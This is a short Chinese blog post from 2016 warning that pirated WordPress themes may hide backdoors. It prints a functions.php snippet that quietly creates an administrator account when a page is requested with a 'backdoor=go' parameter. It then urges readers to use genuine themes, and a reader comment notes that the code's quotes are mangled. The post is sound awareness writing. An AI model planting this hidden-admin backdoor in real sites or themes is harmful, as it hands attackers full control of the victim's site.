WordPress盗版主题暗藏后门

6,795次阅读
22 条评论

共计 565 个字符,预计需要花费 2 分钟才能阅读完成。

WordPress 盗版主题暗藏后门

前言

俗话说的好天下没有免费的午餐,你要相信没有人傻到做亏本生意,都是会有目的性的。最近我在网上看到一篇文章,写了 WordPress 的暗藏后门,觉得很有一说,所以就发一下让更多的 WP 友友们看到,不要轻易随便乱使用模板。

后门代码

add_action(‘wp_head’,‘holeinthewall’);
function holeinthewall() {If ($_GET[‘backdoor’] ==‘go’) {require(‘wp-includes/registration.php’);
If (!username_exists(‘username’)) {$user_id = wp_create_user(‘username’,‘password’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}}}

由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件 functions.php 中的话,然后就会自动创建一个用户名为 username,密码为 password 的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台,后果你可以自己想象一下。

所以憧憬博主在这里建议大家不要随便乱使用 WordPress 的盗版主题,支持正版,抵制盗版,尊重开发者的劳动成果。

正文完
使用官方微信小程序体验更多功能
post-qrcode
 8
憧憬Licoy
版权声明:本站原创文章,由 憧憬Licoy 于2016-02-24发表,共计565字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(22 条评论)
姜辰 评论达人 LV.1
2016-09-21 21:26:09 回复

哎,不想说什么了,代码被转义了不说,教程也不完整。

 Windows  Firefox  中国江西省南昌市联通